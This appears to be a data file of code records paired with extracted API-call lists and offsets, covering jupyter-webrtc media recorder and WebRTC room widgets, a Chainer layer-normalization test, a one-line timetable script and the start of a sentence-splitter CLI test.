    _model_module_version = Unicode(semver_range_frontend).tag(sync=True)
    stream = Instance(MediaStream, allow_none=True).tag(sync=True, **widget_serialization)
    data = Bytes(help="The video data as a byte string.").tag(sync=True, from_json=_memoryview_to_bytes)
    filename = Unicode('recording').tag(sync=True)
    format = Unicode('webm').tag(sync=True)
    record = Bool(False).tag(sync=True)
    autosave = Bool(False).tag(sync=True)

    @observe('data')
    def _check_autosave(self, change):
        # Persist automatically as soon as recorded bytes arrive.
        if self.autosave and len(self.data):
            self.save()

    def play(self):
        """Ask the frontend to play back the recording."""
        self.send({'msg': 'play'})

    def download(self):
        """Ask the frontend to offer the recording as a browser download."""
        self.send({'msg': 'download'})

    def save(self, filename=None):
        """Write the recorded bytes to *filename* (default: ``self.filename``).

        The recording format is appended as an extension when the name
        contains none.  Raises ``ValueError`` if nothing was recorded.
        """
        target = filename or self.filename
        if '.' not in target:
            target = '{0}.{1}'.format(target, self.format)
        if len(self.data) == 0:
            raise ValueError('No data, did you record anything?')
        with open(target, 'wb') as f:
            f.write(self.data)

    _video_src = Unicode('').tag(sync=True)
# monkey patch, same as https://github.com/jupyter-widgets/ipywidgets/pull/2146
# Register a 'from_json' deserializer on widgets.Image.value when one is
# missing, converting the incoming buffer to bytes via .tobytes() (None is
# passed through untouched).
if 'from_json' not in widgets.Image.value.metadata:
    widgets.Image.value.metadata['from_json'] = lambda js, obj: None if js is None else js.tobytes()
@register
class MediaImageRecorder(DOMWidget):
    """Creates a recorder which allows to grab an Image from a MediaStream widget.
    """
    _model_module = Unicode('jupyter-webrtc').tag(sync=True)
    _view_module = Unicode('jupyter-webrtc').tag(sync=True)
    _model_name = Unicode('MediaImageRecorderModel').tag(sync=True)
    _view_name = Unicode('MediaImageRecorderView').tag(sync=True)
    _view_module_version = Unicode(semver_range_frontend).tag(sync=True)
    _model_module_version = Unicode(semver_range_frontend).tag(sync=True)
    # The media stream to grab still images from.
    stream = Instance(MediaStream, allow_none=True).tag(sync=True, **widget_serialization)
    # Image widget that receives each grabbed frame.
    image = Instance(Image, allow_none=True).tag(sync=True, **widget_serialization)
    # Base file name used by save().
    filename = Unicode('recording').tag(sync=True)
    # When True, every grabbed frame is written to disk automatically.
    autosave = Bool(False)

    def __init__(self, **kwargs):
        super(MediaImageRecorder, self).__init__(**kwargs)
        # Watch the image payload so autosave can react to new frames.
        self.image.observe(self._check_autosave, 'value')

    @observe('image')
    def _bind_image(self, change):
        # Re-attach the value observer when the image widget is swapped out.
        if change.old:
            change.old.unobserve(self._check_autosave, 'value')
        change.new.observe(self._check_autosave, 'value')

    def _check_autosave(self, change):
        # Persist the frame as soon as data arrives, if autosave is enabled.
        if len(self.image.value) and self.autosave:
            self.save()

    @traitlets.default('image')
    def _default_image(self):
        # Lazily create an empty Image widget when none was supplied.
        return Image()

    def grab(self):
        # Ask the frontend to capture the current frame of the stream.
        self.send({'msg': 'grab'})

    def download(self):
        # Ask the frontend to trigger a browser download of the image.
        self.send({'msg': 'download'})

    def save(self, filename=None):
        """Save the grabbed image to a file.

        Parameters
        ----------
        filename: str or None
            Target path; falls back to ``self.filename``.  When the name has
            no extension, the image's format is appended.

        Raises ``ValueError`` when no frame has been grabbed yet.
        """
        filename = filename or self.filename
        if '.' not in filename:
            filename += '.' + self.image.format
        if len(self.image.value) == 0:
            raise ValueError('No data, did you record anything?')
        with open(filename, 'wb') as f:
            f.write(self.image.value)
@register
class WebRTCPeer(DOMWidget):
    """One end of a WebRTC peer-to-peer connection."""
    _model_module = Unicode('jupyter-webrtc').tag(sync=True)
    _view_module = Unicode('jupyter-webrtc').tag(sync=True)
    _view_name = Unicode('WebRTCPeerView').tag(sync=True)
    _model_name = Unicode('WebRTCPeerModel').tag(sync=True)
    _view_module_version = Unicode(semver_range_frontend).tag(sync=True)
    _model_module_version = Unicode(semver_range_frontend).tag(sync=True)
    # Stream captured on this side and sent to the remote peer.
    stream_local = Instance(MediaStream, allow_none=True).tag(sync=True, **widget_serialization)
    # Stream received from the remote peer.
    stream_remote = Instance(MediaStream, allow_none=True).tag(sync=True, **widget_serialization)
    # Identifiers of the local and remote ends of the connection.
    id_local = Unicode('').tag(sync=True)
    id_remote = Unicode('').tag(sync=True)
    # Connection state flags; read-only on the Python side, updated by the frontend.
    connected = Bool(False, read_only=True).tag(sync=True)
    failed = Bool(False, read_only=True).tag(sync=True)

    def connect(self):
        # Ask the frontend to initiate the peer connection.
        self.send({'msg': 'connect'})
@register
class WebRTCRoom(DOMWidget):
    """Base class for a WebRTC 'room': a named group of peers sharing streams."""
    _model_module = Unicode('jupyter-webrtc').tag(sync=True)
    _view_module = Unicode('jupyter-webrtc').tag(sync=True)
    _model_name = Unicode('WebRTCRoomModel').tag(sync=True)
    _view_module_version = Unicode(semver_range_frontend).tag(sync=True)
    _model_module_version = Unicode(semver_range_frontend).tag(sync=True)
    # Name of the room to join.
    room = Unicode('room').tag(sync=True)
    # Local stream shared with the other participants.
    stream = Instance(MediaStream, allow_none=True).tag(sync=True, **widget_serialization)
    # Identifier assigned by the frontend (read-only) and a display name.
    id = Unicode(read_only=True).tag(sync=True)
    nickname = Unicode('anonymous').tag(sync=True)
    # Peer connections in this room and the streams they deliver.
    peers = List(Instance(WebRTCPeer), [], allow_none=False).tag(sync=True, **widget_serialization)
    streams = List(Instance(MediaStream), [], allow_none=False).tag(sync=True, **widget_serialization)
@register
class WebRTCRoomLocal(WebRTCRoom):
    # Room variant backed by the frontend's WebRTCRoomLocalModel
    # (presumably signalling within the local browser only — verify in frontend code).
    _model_name = Unicode('WebRTCRoomLocalModel').tag(sync=True)
@register
class WebRTCRoomMqtt(WebRTCRoom):
    """Room variant that talks to an MQTT-over-websockets endpoint for signalling."""
    _model_name = Unicode('WebRTCRoomMqttModel').tag(sync=True)
    # Websocket URL of the broker used to exchange signalling messages.
    server = Unicode('wss://iot.eclipse.org:443/ws').tag(sync=True)
| [
"logging.getLogger",
"traitlets.Unicode",
"traitlets.Bytes",
"traitlets.default",
"traitlets.Dict",
"traitlets.Instance",
"os.path.splitext",
"traitlets.observe",
"traitlets.TraitError",
"traitlets.validate",
"traitlets.Int",
"ipywidgets.Image",
"urllib.request.urlopen",
"traitlets.Bool"
] | [((492, 527), 'logging.getLogger', 'logging.getLogger', (['"""jupyter-webrtc"""'], {}), "('jupyter-webrtc')\n", (509, 527), False, 'import logging\n'), ((1752, 1771), 'traitlets.validate', 'validate', (['"""max_fps"""'], {}), "('max_fps')\n", (1760, 1771), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((8571, 8586), 'traitlets.observe', 'observe', (['"""data"""'], {}), "('data')\n", (8578, 8586), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((10204, 10215), 'traitlets.Bool', 'Bool', (['(False)'], {}), '(False)\n', (10208, 10215), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((10374, 10390), 'traitlets.observe', 'observe', (['"""image"""'], {}), "('image')\n", (10381, 10390), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((10693, 10719), 'traitlets.default', 'traitlets.default', (['"""image"""'], {}), "('image')\n", (10710, 10719), False, 'import traitlets\n'), ((10765, 10772), 'ipywidgets.Image', 'Image', ([], {}), '()\n', (10770, 10772), False, 'from ipywidgets import DOMWidget, Image, register, widget_serialization\n'), ((945, 970), 'traitlets.Unicode', 'Unicode', (['"""jupyter-webrtc"""'], {}), "('jupyter-webrtc')\n", (952, 970), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((1005, 1030), 'traitlets.Unicode', 'Unicode', (['"""jupyter-webrtc"""'], {}), "('jupyter-webrtc')\n", (1012, 1030), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((1063, 1089), 'traitlets.Unicode', 'Unicode', (['"""MediaStreamView"""'], {}), "('MediaStreamView')\n", (1070, 1089), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, 
validate\n'), ((1123, 1150), 'traitlets.Unicode', 'Unicode', (['"""MediaStreamModel"""'], {}), "('MediaStreamModel')\n", (1130, 1150), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((1193, 1223), 'traitlets.Unicode', 'Unicode', (['semver_range_frontend'], {}), '(semver_range_frontend)\n', (1200, 1223), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((1267, 1297), 'traitlets.Unicode', 'Unicode', (['semver_range_frontend'], {}), '(semver_range_frontend)\n', (1274, 1297), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((1495, 1523), 'traitlets.Unicode', 'Unicode', (['"""WidgetStreamModel"""'], {}), "('WidgetStreamModel')\n", (1502, 1523), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((1556, 1583), 'traitlets.Unicode', 'Unicode', (['"""WidgetStreamView"""'], {}), "('WidgetStreamView')\n", (1563, 1583), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((1613, 1650), 'traitlets.Instance', 'Instance', (['DOMWidget'], {'allow_none': '(False)'}), '(DOMWidget, allow_none=False)\n', (1621, 1650), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((1704, 1730), 'traitlets.Int', 'Int', (['None'], {'allow_none': '(True)'}), '(None, allow_none=True)\n', (1707, 1730), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((1894, 1952), 'traitlets.TraitError', 'TraitError', (['"""max_fps attribute must be a positive integer"""'], {}), "('max_fps attribute must be a positive integer')\n", (1904, 1952), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((2091, 2118), 
'traitlets.Unicode', 'Unicode', (['"""ImageStreamModel"""'], {}), "('ImageStreamModel')\n", (2098, 2118), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((2147, 2162), 'traitlets.Instance', 'Instance', (['Image'], {}), '(Image)\n', (2155, 2162), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((2686, 2713), 'traitlets.Unicode', 'Unicode', (['"""VideoStreamModel"""'], {}), "('VideoStreamModel')\n", (2693, 2713), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((2743, 2790), 'traitlets.Unicode', 'Unicode', (['"""mp4"""'], {'help': '"""The format of the video."""'}), "('mp4', help='The format of the video.')\n", (2750, 2790), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((2818, 2887), 'traitlets.Bytes', 'Bytes', (['None'], {'allow_none': '(True)', 'help': '"""The video data as a byte string."""'}), "(None, allow_none=True, help='The video data as a byte string.')\n", (2823, 2887), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((2914, 2955), 'traitlets.Bool', 'Bool', (['(True)'], {'help': '"""Play video or pause it"""'}), "(True, help='Play video or pause it')\n", (2918, 2955), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((2982, 3072), 'traitlets.Bool', 'Bool', (['(True)'], {'help': '"""When true, the video will start from the beginning after finishing"""'}), "(True, help=\n 'When true, the video will start from the beginning after finishing')\n", (2986, 3072), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((5893, 5921), 'traitlets.Unicode', 'Unicode', (['"""CameraStreamModel"""'], {}), 
"('CameraStreamModel')\n", (5900, 5921), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((6093, 6266), 'traitlets.Dict', 'Dict', (["{'audio': True, 'video': True}"], {'help': '"""Constraints for the camera, see https://developer.mozilla.org/en-US/docs/Web/API/MediaDevices/getUserMedia for details"""'}), "({'audio': True, 'video': True}, help=\n 'Constraints for the camera, see https://developer.mozilla.org/en-US/docs/Web/API/MediaDevices/getUserMedia for details'\n )\n", (6097, 6266), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((7819, 7844), 'traitlets.Unicode', 'Unicode', (['"""jupyter-webrtc"""'], {}), "('jupyter-webrtc')\n", (7826, 7844), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((7879, 7904), 'traitlets.Unicode', 'Unicode', (['"""jupyter-webrtc"""'], {}), "('jupyter-webrtc')\n", (7886, 7904), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((7938, 7967), 'traitlets.Unicode', 'Unicode', (['"""MediaRecorderModel"""'], {}), "('MediaRecorderModel')\n", (7945, 7967), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((8000, 8028), 'traitlets.Unicode', 'Unicode', (['"""MediaRecorderView"""'], {}), "('MediaRecorderView')\n", (8007, 8028), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((8071, 8101), 'traitlets.Unicode', 'Unicode', (['semver_range_frontend'], {}), '(semver_range_frontend)\n', (8078, 8101), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((8145, 8175), 'traitlets.Unicode', 'Unicode', (['semver_range_frontend'], {}), '(semver_range_frontend)\n', (8152, 8175), False, 'from traitlets import 
observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((8205, 8243), 'traitlets.Instance', 'Instance', (['MediaStream'], {'allow_none': '(True)'}), '(MediaStream, allow_none=True)\n', (8213, 8243), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((8294, 8340), 'traitlets.Bytes', 'Bytes', ([], {'help': '"""The video data as a byte string."""'}), "(help='The video data as a byte string.')\n", (8299, 8340), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((8403, 8423), 'traitlets.Unicode', 'Unicode', (['"""recording"""'], {}), "('recording')\n", (8410, 8423), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((8452, 8467), 'traitlets.Unicode', 'Unicode', (['"""webm"""'], {}), "('webm')\n", (8459, 8467), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((8496, 8507), 'traitlets.Bool', 'Bool', (['(False)'], {}), '(False)\n', (8500, 8507), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((8538, 8549), 'traitlets.Bool', 'Bool', (['(False)'], {}), '(False)\n', (8542, 8549), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((9158, 9169), 'traitlets.Unicode', 'Unicode', (['""""""'], {}), "('')\n", (9165, 9169), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((9580, 9605), 'traitlets.Unicode', 'Unicode', (['"""jupyter-webrtc"""'], {}), "('jupyter-webrtc')\n", (9587, 9605), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((9640, 9665), 'traitlets.Unicode', 'Unicode', (['"""jupyter-webrtc"""'], {}), "('jupyter-webrtc')\n", (9647, 
9665), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((9699, 9733), 'traitlets.Unicode', 'Unicode', (['"""MediaImageRecorderModel"""'], {}), "('MediaImageRecorderModel')\n", (9706, 9733), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((9766, 9799), 'traitlets.Unicode', 'Unicode', (['"""MediaImageRecorderView"""'], {}), "('MediaImageRecorderView')\n", (9773, 9799), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((9842, 9872), 'traitlets.Unicode', 'Unicode', (['semver_range_frontend'], {}), '(semver_range_frontend)\n', (9849, 9872), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((9916, 9946), 'traitlets.Unicode', 'Unicode', (['semver_range_frontend'], {}), '(semver_range_frontend)\n', (9923, 9946), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((9976, 10014), 'traitlets.Instance', 'Instance', (['MediaStream'], {'allow_none': '(True)'}), '(MediaStream, allow_none=True)\n', (9984, 10014), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((10066, 10098), 'traitlets.Instance', 'Instance', (['Image'], {'allow_none': '(True)'}), '(Image, allow_none=True)\n', (10074, 10098), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((10153, 10173), 'traitlets.Unicode', 'Unicode', (['"""recording"""'], {}), "('recording')\n", (10160, 10173), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((11298, 11323), 'traitlets.Unicode', 'Unicode', (['"""jupyter-webrtc"""'], {}), "('jupyter-webrtc')\n", (11305, 11323), False, 'from traitlets import observe, Bool, Bytes, 
Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((11358, 11383), 'traitlets.Unicode', 'Unicode', (['"""jupyter-webrtc"""'], {}), "('jupyter-webrtc')\n", (11365, 11383), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((11416, 11441), 'traitlets.Unicode', 'Unicode', (['"""WebRTCPeerView"""'], {}), "('WebRTCPeerView')\n", (11423, 11441), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((11475, 11501), 'traitlets.Unicode', 'Unicode', (['"""WebRTCPeerModel"""'], {}), "('WebRTCPeerModel')\n", (11482, 11501), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((11544, 11574), 'traitlets.Unicode', 'Unicode', (['semver_range_frontend'], {}), '(semver_range_frontend)\n', (11551, 11574), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((11618, 11648), 'traitlets.Unicode', 'Unicode', (['semver_range_frontend'], {}), '(semver_range_frontend)\n', (11625, 11648), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((11684, 11722), 'traitlets.Instance', 'Instance', (['MediaStream'], {'allow_none': '(True)'}), '(MediaStream, allow_none=True)\n', (11692, 11722), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((11782, 11820), 'traitlets.Instance', 'Instance', (['MediaStream'], {'allow_none': '(True)'}), '(MediaStream, allow_none=True)\n', (11790, 11820), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((11875, 11886), 'traitlets.Unicode', 'Unicode', (['""""""'], {}), "('')\n", (11882, 11886), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((11918, 11929), 
'traitlets.Unicode', 'Unicode', (['""""""'], {}), "('')\n", (11925, 11929), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((11961, 11988), 'traitlets.Bool', 'Bool', (['(False)'], {'read_only': '(True)'}), '(False, read_only=True)\n', (11965, 11988), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((12017, 12044), 'traitlets.Bool', 'Bool', (['(False)'], {'read_only': '(True)'}), '(False, read_only=True)\n', (12021, 12044), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((12183, 12208), 'traitlets.Unicode', 'Unicode', (['"""jupyter-webrtc"""'], {}), "('jupyter-webrtc')\n", (12190, 12208), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((12243, 12268), 'traitlets.Unicode', 'Unicode', (['"""jupyter-webrtc"""'], {}), "('jupyter-webrtc')\n", (12250, 12268), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((12302, 12328), 'traitlets.Unicode', 'Unicode', (['"""WebRTCRoomModel"""'], {}), "('WebRTCRoomModel')\n", (12309, 12328), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((12371, 12401), 'traitlets.Unicode', 'Unicode', (['semver_range_frontend'], {}), '(semver_range_frontend)\n', (12378, 12401), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((12445, 12475), 'traitlets.Unicode', 'Unicode', (['semver_range_frontend'], {}), '(semver_range_frontend)\n', (12452, 12475), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((12503, 12518), 'traitlets.Unicode', 'Unicode', (['"""room"""'], {}), "('room')\n", (12510, 12518), False, 'from traitlets import 
observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((12547, 12585), 'traitlets.Instance', 'Instance', (['MediaStream'], {'allow_none': '(True)'}), '(MediaStream, allow_none=True)\n', (12555, 12585), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((12634, 12657), 'traitlets.Unicode', 'Unicode', ([], {'read_only': '(True)'}), '(read_only=True)\n', (12641, 12657), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((12688, 12708), 'traitlets.Unicode', 'Unicode', (['"""anonymous"""'], {}), "('anonymous')\n", (12695, 12708), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((12992, 13023), 'traitlets.Unicode', 'Unicode', (['"""WebRTCRoomLocalModel"""'], {}), "('WebRTCRoomLocalModel')\n", (12999, 13023), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((13103, 13133), 'traitlets.Unicode', 'Unicode', (['"""WebRTCRoomMqttModel"""'], {}), "('WebRTCRoomMqttModel')\n", (13110, 13133), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((13163, 13202), 'traitlets.Unicode', 'Unicode', (['"""wss://iot.eclipse.org:443/ws"""'], {}), "('wss://iot.eclipse.org:443/ws')\n", (13170, 13202), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((5039, 5060), 'os.path.splitext', 'os.path.splitext', (['url'], {}), '(url)\n', (5055, 5060), False, 'import os\n'), ((12741, 12761), 'traitlets.Instance', 'Instance', (['WebRTCPeer'], {}), '(WebRTCPeer)\n', (12749, 12761), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((12843, 12864), 'traitlets.Instance', 'Instance', (['MediaStream'], {}), '(MediaStream)\n', (12851, 
12864), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((3746, 3765), 'os.path.splitext', 'os.path.splitext', (['f'], {}), '(f)\n', (3762, 3765), False, 'import os\n'), ((5206, 5218), 'urllib.request.urlopen', 'urlopen', (['url'], {}), '(url)\n', (5213, 5218), False, 'from urllib.request import urlopen\n')] |
import numpy
from chainer import functions
from chainer import testing
@testing.parameterize(*(testing.product({
    'batchsize': [1, 5],
    'size': [10, 20],
    'dtype': [numpy.float32],
    'eps': [1e-5, 1e-1],
})))
@testing.inject_backend_tests(
    None,
    # CPU tests
    [
        {},
    ]
    # GPU tests
    + testing.product({
        'use_cuda': [True],
        'use_cudnn': ['never', 'always'],
        'cuda_device': [0, 1],
    })
    # ChainerX tests
    + [
        {'use_chainerx': True, 'chainerx_device': 'native:0'},
        {'use_chainerx': True, 'chainerx_device': 'cuda:0'},
        {'use_chainerx': True, 'chainerx_device': 'cuda:1'},
    ]
)
class TestLayerNormalization(testing.FunctionTestCase):
    """Functional test of F.layer_normalization against a NumPy reference."""

    def setUp(self):
        # float16 needs loose tolerances everywhere; float32 can afford a
        # tighter forward check.
        loose = {'atol': 1e-3, 'rtol': 1e-2}
        if self.dtype == numpy.float16:
            self.check_forward_options = dict(loose)
        else:
            self.check_forward_options = {'atol': 1e-4, 'rtol': 1e-3}
        self.check_backward_options = dict(loose)
        self.check_double_backward_options = dict(loose)

    def generate_inputs(self):
        shape = (self.batchsize, self.size)
        param_size = numpy.prod(shape) // shape[0]

        def uniform(size):
            # Random values in [-1, 1) cast to the parameterized dtype.
            return numpy.random.uniform(-1, 1, size).astype(self.dtype)

        return uniform(shape), uniform(param_size), uniform(param_size)

    def forward_expected(self, inputs):
        x, gamma, beta = inputs
        # NumPy reference: normalize each row to zero mean / unit variance,
        # then scale by gamma and shift by beta.
        centered = x - numpy.mean(x, axis=1, keepdims=True)
        variance = numpy.mean(numpy.square(centered), axis=1, keepdims=True)
        std = numpy.sqrt(variance + self.eps)
        y_expected = (
            numpy.expand_dims(gamma, axis=0) * centered / std
            + numpy.expand_dims(beta, axis=0))
        return y_expected,

    def forward(self, inputs, device):
        x, gamma, beta = inputs
        return functions.layer_normalization(x, gamma, beta, eps=self.eps),
testing.run_module(__name__, __file__)
| [
"numpy.mean",
"numpy.prod",
"numpy.sqrt",
"chainer.functions.layer_normalization",
"chainer.testing.run_module",
"numpy.square",
"chainer.testing.product",
"numpy.expand_dims",
"numpy.random.uniform"
] | [((2133, 2171), 'chainer.testing.run_module', 'testing.run_module', (['__name__', '__file__'], {}), '(__name__, __file__)\n', (2151, 2171), False, 'from chainer import testing\n'), ((1658, 1694), 'numpy.mean', 'numpy.mean', (['x'], {'axis': '(1)', 'keepdims': '(True)'}), '(x, axis=1, keepdims=True)\n', (1668, 1694), False, 'import numpy\n'), ((1781, 1807), 'numpy.sqrt', 'numpy.sqrt', (['(var + self.eps)'], {}), '(var + self.eps)\n', (1791, 1807), False, 'import numpy\n'), ((2053, 2112), 'chainer.functions.layer_normalization', 'functions.layer_normalization', (['x', 'gamma', 'beta'], {'eps': 'self.eps'}), '(x, gamma, beta, eps=self.eps)\n', (2082, 2112), False, 'from chainer import functions\n'), ((98, 206), 'chainer.testing.product', 'testing.product', (["{'batchsize': [1, 5], 'size': [10, 20], 'dtype': [numpy.float32], 'eps': [\n 1e-05, 0.1]}"], {}), "({'batchsize': [1, 5], 'size': [10, 20], 'dtype': [numpy.\n float32], 'eps': [1e-05, 0.1]})\n", (113, 206), False, 'from chainer import testing\n'), ((1307, 1324), 'numpy.prod', 'numpy.prod', (['shape'], {}), '(shape)\n', (1317, 1324), False, 'import numpy\n'), ((1720, 1742), 'numpy.square', 'numpy.square', (['(x - mean)'], {}), '(x - mean)\n', (1732, 1742), False, 'import numpy\n'), ((1909, 1940), 'numpy.expand_dims', 'numpy.expand_dims', (['beta'], {'axis': '(0)'}), '(beta, axis=0)\n', (1926, 1940), False, 'import numpy\n'), ((326, 424), 'chainer.testing.product', 'testing.product', (["{'use_cuda': [True], 'use_cudnn': ['never', 'always'], 'cuda_device': [0, 1]}"], {}), "({'use_cuda': [True], 'use_cudnn': ['never', 'always'],\n 'cuda_device': [0, 1]})\n", (341, 424), False, 'from chainer import testing\n'), ((1349, 1383), 'numpy.random.uniform', 'numpy.random.uniform', (['(-1)', '(1)', 'shape'], {}), '(-1, 1, shape)\n', (1369, 1383), False, 'import numpy\n'), ((1419, 1452), 'numpy.random.uniform', 'numpy.random.uniform', (['(-1)', '(1)', 'size'], {}), '(-1, 1, size)\n', (1439, 1452), False, 'import numpy\n'), 
((1487, 1520), 'numpy.random.uniform', 'numpy.random.uniform', (['(-1)', '(1)', 'size'], {}), '(-1, 1, size)\n', (1507, 1520), False, 'import numpy\n'), ((1843, 1875), 'numpy.expand_dims', 'numpy.expand_dims', (['gamma'], {'axis': '(0)'}), '(gamma, axis=0)\n', (1860, 1875), False, 'import numpy\n')] |
import matse_stundenplan
matse_stundenplan.run() | [
"matse_stundenplan.run"
] | [((26, 49), 'matse_stundenplan.run', 'matse_stundenplan.run', ([], {}), '()\n', (47, 49), False, 'import matse_stundenplan\n')] |
import subprocess
import tempfile
import unittest
# Keyword arguments shared by every subprocess.run invocation in these tests:
# capture stdout as text and abort a hung process after five seconds.
COMMON_SUBPROCESS_ARGS = {
    'timeout': 5,
    'stdout': subprocess.PIPE,
    'universal_newlines': True
}
class TestCommandLineInterface(unittest.TestCase):
    """End-to-end tests of the hasami command line interface."""

    # Mixed single- and multi-sentence input, and the one-sentence-per-line
    # output the CLI is expected to produce.
    _INPUT = 'これは単純な文です。\nこれが最初の文です。これは二番目の文です。これが最後の文です。'
    _EXPECTED = 'これは単純な文です。\nこれが最初の文です。\nこれは二番目の文です。\nこれが最後の文です。\n'
